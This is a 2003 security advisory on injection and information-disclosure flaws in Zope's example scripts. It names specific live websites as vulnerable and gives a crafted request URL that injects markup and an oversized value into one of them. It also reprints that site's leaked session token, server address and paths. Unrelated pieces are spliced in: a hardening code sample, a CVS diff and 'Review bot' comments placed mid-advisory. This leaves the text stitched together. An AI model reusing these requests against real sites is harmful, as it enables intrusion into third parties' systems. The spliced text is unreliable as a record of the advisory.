------------------------------------------------------------------
- EXPL-A-2003-009 exploitlabs.com Advisory 009
------------------------------------------------------------------

-=- The DoPe on zOpE -=-

Donnie Werner
June 19, 2003
exploitlabs.com

Product:
--------
Zope -=- open source application server
http://www.zope.com/

Vulnerability(s):
=================
1  - Empty Upload ( physical location dump )
     -=- /Examples/FileLibrary/addFile
2  - Html / js injection
     -=- /Examples/db/
3  - Blank Query
     -=- /Examples/ShoppingCart
3a - iframe Query ( Html/js injection )
     -=- /Examples/ShoppingCart/addItems
3b - Unchecked Input Length
     -=- /Examples/ShoppingCart/addItems
3c - Unchecked Characters
     -=- /Examples/ShoppingCart/addItems

Remote:
-------
yup

not vulnerable to #1 ( blank upload )
-----------------------------------
examples..

http://www.aixtraware.de/TCPware/Examples
Server: Zope/(Zope 2.6.1 (binary release, python 2.1, linux2-x86), python 2.1.3, linux2) ZServer/1.1b1

http://ispg.csu.edu.au
Server: Zope/(Zope 2.5.1 (source release, python 2.1, linux2), python 2.1.3, freebsd4) ZServer/1.1b1

http://www.jungle2.org
Server: Zope/(Zope 2.5.1 (OpenBSD package zope-2.5.1p1), python 2.1.3, openbsd3) ZServer/1.1b1

vulnerable
----------
Example URLS - #1:

http://klever.multimedia.fh-augsburg.de
Server: Zope/(Zope 2.6.1 (source release, python 2.1, linux2), python 2.1.3, linux2) ZServer/1.1b1

http://grlug.org/
Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.1.2 mod_perl/1.26

http://grlug.org/zope/Examples/FileLibrary/addFile

Error...
Zope has encountered an error while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.

Troubleshooting Suggestions
The URL may be incorrect.
The parameters passed to this resource may be incorrect.
A resource that this resource relies on may be encountering an error.
For more detailed information about the error, please refer to the HTML source for this page.
If the error persists please contact the site maintainer. Thank you for your patience.

Traceback (innermost last):
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 150, in publish_module
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 114, in publish
  File /usr/local/src/zope/lib/python/Zope/__init__.py, line 159, in zpublisher_exception_hook
    (Object: FileLibrary)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 98, in publish
  File /usr/local/src/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply
    (Object: addFile)
  File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec
    (Object: addFile)
  File /usr/local/src/zope/lib/python/Products/PythonScripts/PythonScript.py, line 302, in _exec
    (Object: addFile)
    (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, (,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/src/zope/lib/python/OFS/Image.py, line 52, in manage_addFile
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 236, in _setObject
    (Object: Files)
  File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId
    (Object: Files)
Bad Request: (see above)

Example-1.2:

http://www.pitch.com
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12

/Examples/FileLibrary/addFile

Site Error
An error was encountered while publishing this resource.

Error Type: Bad Request
Error Value: Empty or invalid id specified.
Traceback
Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in publish
  File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply
    (Object: addFile)
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__
    (Object: addFile)
  File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec
    (Object: addFile)
  File /usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py, line 291, in _exec
    (Object: addFile)
    (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, (,), {}, None))
  File Script (Python), line 7, in addFile
  File /usr/local/zope/lib/python/OFS/Image.py, line 52, in manage_addFile
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 219, in _setObject
    (Object: Files)
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId
    (Object: Files)
Bad Request: Empty or invalid id specified.

================================================================================================

Example-2.1:

http://www.c-media.com.au/Examples/db/ExampledbBrowseReport
http://198.78.66.174:8080/Examples/

exploit:
--------
edit the "description" field for html / js injection

http://ebay.com/

Example 3b - 3c:
----------------
Sending any string longer than 11 characters in the quantity field causes a dump.

details here...
http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=123456789101112131415&orders.id%3Arecords=510-122&orders.quantity%3Arecords=+%3Ctd%3ENeed+to+go+out+of+town+for+a+few+days%2C+and+no+one+can+feed+your+pigeons%3F+Don%27t+worry%2C+we+now+have+the+virtually+spillproof+hopper+feeder.+Made+from+birch+plywood+it+holds+from+30+to+35+pounds+of+grain.+Pigeons+can+get+at+the+feed+through+holes+in+the+plexiglass+cover%2C+but+will+not+be+able+to+kick+out+any+feed.%3C%2Ftd%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0

reveal these items..

SESSION                   id: 10546821410043251757, token: 40684361A01gE7Hjjvc, contents: []
SERVER_URL                'http://www.sfweekly.com'
VirtualRootPhysicalPath   ('', 'san')
PUBLISHED
URL                       'http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems'
AUTHENTICATED_USER        Anonymous User
TraversalRequestNameStack []
AUTHENTICATION_PATH       'san/virtual_hosts'
URL0                      http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems
URL1                      http://www.sfweekly.com/calendar/Examples/ShoppingCart
URL2                      http://www.sfweekly.com/calendar/Examples
URL3                      http://www.sfweekly.com/calendar
URL4                      http://www.sfweekly.com
BASE0                     http://www.sfweekly.com
BASE1                     http://www.sfweekly.com
BASE2                     http://www.sfweekly.com/calendar
BASE3                     http://www.sfweekly.com/calendar/Examples
BASE4                     http://www.sfweekly.com/calendar/Examples/ShoppingCart
BASE5                     http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems

environ
DOCUMENT_ROOT             '/home/nti/htdocs/san'
SERVER_ADDR               '63.241.135.221'
HTTP_ACCEPT_ENCODING      'gzip, deflate'
SCRIPT_FILENAME           '/home/httpd/fastcgi/slave2'
GATEWAY_INTERFACE         'CGI/1.1'
SERVER_PORT               '80'
PATH_TRANSLATED           '/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/calendar/Examples/ShoppingCart/addItems'
source                    'slave2'
UNIQUE_ID                 'Pt02bz-xh80AAC79HHU'
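Items 3a to 3c above share one root cause: a value from the quantity field reaches number conversion and page output without any check on its length or character set, and the resulting exception hands the client the request and session dump shown. The following is an added example, not code from the advisory or from Zope's Examples folder, of how an addItems handler can validate records of the shape the request carries (orders.id / orders.quantity pairs) before conversion and report rejects with a generic, escaped message; the catalogue id pattern, the size limits and the sample records are assumptions.

```python
import re
from html import escape

# Constructed sample records shaped like the orders.id:records /
# orders.quantity:records pairs of the addItems request (values made up).
SAMPLE_ORDERS = [
    {"id": "510-007", "quantity": "2"},
    {"id": "510-007", "quantity": "123456789101112131415"},   # 3b: oversized value
    {"id": "510-122", "quantity": "<td>hopper feeder</td>"},  # 3a/3c: markup in a number
    {"id": "510-115", "quantity": "0"},
]

ID_RE = re.compile(r"[0-9]{3}-[0-9]{3}")    # assumed catalogue id shape, e.g. 510-007
MAX_QTY_DIGITS = 6                          # assumed limit; refuse long strings before int()
QTY_RE = re.compile(r"[0-9]{1,%d}" % MAX_QTY_DIGITS)
MAX_QTY = 999                               # assumed business limit


class RejectedOrder(ValueError):
    """A record failed validation; the message is safe to echo to the client."""


def validate_order(record):
    """Return (item_id, quantity) or raise RejectedOrder.

    Shape checks run before int(): a 21-digit or markup-laden string is
    refused by the regex and never reaches a conversion that could raise.
    """
    item_id = record.get("id", "")
    qty = record.get("quantity", "")
    if not ID_RE.fullmatch(item_id):
        raise RejectedOrder("invalid item id")
    if not QTY_RE.fullmatch(qty):
        raise RejectedOrder("quantity must be 1 to %d digits" % MAX_QTY_DIGITS)
    quantity = int(qty)
    if quantity > MAX_QTY:
        raise RejectedOrder("quantity exceeds %d" % MAX_QTY)
    return item_id, quantity


def add_items(records):
    """Hardened addItems: keep valid records, report bad ones with an escaped
    generic message, and let no exception (hence no REQUEST dump) escape."""
    accepted, errors = [], []
    for rec in records:
        try:
            accepted.append(validate_order(rec))
        except RejectedOrder as exc:
            errors.append("item %s rejected: %s" % (escape(rec.get("id", "")), exc))
    return accepted, errors
```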
===================================================================
extra notes
===================================================================

Update of /cvs-repository/Releases/Zope/lib/python/Products/PythonScripts
In directory cvs.zope.org:/tmp/cvs-serv29374/Products/PythonScripts

Modified Files:
    Utility.py module_access_examples.py
Log Message:
Merge evan-modsec_fix-branch

=== Releases/Zope/lib/python/Products/PythonScripts/Utility.py 1.4 => 1.5 === __version__='$Revision$'[11:-2] -from AccessControl import ModuleSecurityInfo, ClassSecurityInfo -from Globals import InitializeClass -import string - -def allow_module(module_name): - """Allow a module and all its contents to be used from a - restricted Script. The argument module_name may be a simple - or dotted module or package name. Note that if a package - path is given, all modules in the path will be available.""" - ModuleSecurityInfo(module_name).setDefaultAccess(1) - dot = string.find(module_name, '.') - while dot > 0: - ModuleSecurityInfo(module_name[:dot]).setDefaultAccess(1) - dot = string.find(module_name, '.', dot + 1) - -def allow_class(Class): - """Allow a class and all of its methods to be used from a - restricted Script. The argument Class must be a class.""" - Class._security = sec = ClassSecurityInfo() - sec.declareObjectPublic() - sec.setDefaultAccess(1) - sec.apply(Class) - InitializeClass(Class) +# These have been relocated, and should be imported from AccessControl +from AccessControl import allow_module, allow_class === Releases/Zope/lib/python/Products/PythonScripts/module_access_examples.py 1.1 => 1.2 === ''' -from Products.PythonScripts.Utility import allow_module, allow_class +from AccessControl import allow_module, allow_class, allow_type from AccessControl import ModuleSecurityInfo, ClassSecurityInfo from Globals import InitializeClass
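Review bot: the Utility.py hunk reduces the module to a compatibility shim (`from AccessControl import allow_module, allow_class`) whose only migration hint is a source comment; since both helpers widen what restricted Python Scripts may import, consider emitting a DeprecationWarning on import or stating the move in the module docstring, so that sites auditing their module-access policy look in AccessControl. The removed allow_module docstring also records a broad effect worth keeping visible at the new location: "if a package path is given, all modules in the path will be available", which the loop over `string.find(module_name, '.')` implements by calling setDefaultAccess(1) on every parent package.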
@@ -42,9 +42,9 @@ # ModuleSecurityInfo('re').declarePublic('compile', 'findall', # 'match', 'search', 'split', 'sub', 'subn', 'error', # 'I', 'L', 'M', 'S', 'X') -# from re import RegexObject, MatchObject -# allow_class(RegexObject) -# allow_class(MatchObject) +# import re +# allow_type(type(re.compile(''))) +# allow_type(type(re.match('x','x'))) # ModuleSecurityInfo('StringIO').declarePublic('StringIO'

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
info@zope.com - Concurrent with this advisory

Credits:
--------
Donnie Werner
http://exploitlabs.com
"we're finding your holes"
morning_wood@frame4.com - get tested

-------------------------------------------------------------------------
be a good vendor... test your products first, it is your problem, fix it.
http://nothackers.org - it's t0day
-------------------------------------------------------------------------
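Review bot: in the @@ -42,9 hunk the match-object type is derived from a live call, `allow_type(type(re.match('x','x')))`, which is correct only because that particular pattern always matches; if someone adapts the example with a non-matching sample, `re.match` returns None and `allow_type` would whitelist NoneType instead of the match type. Because these commented lines are meant to be copied into site policy, add a comment stating why the sample cannot fail, or use `type(re.compile('').match(''))` with the same note, so the intent survives editing.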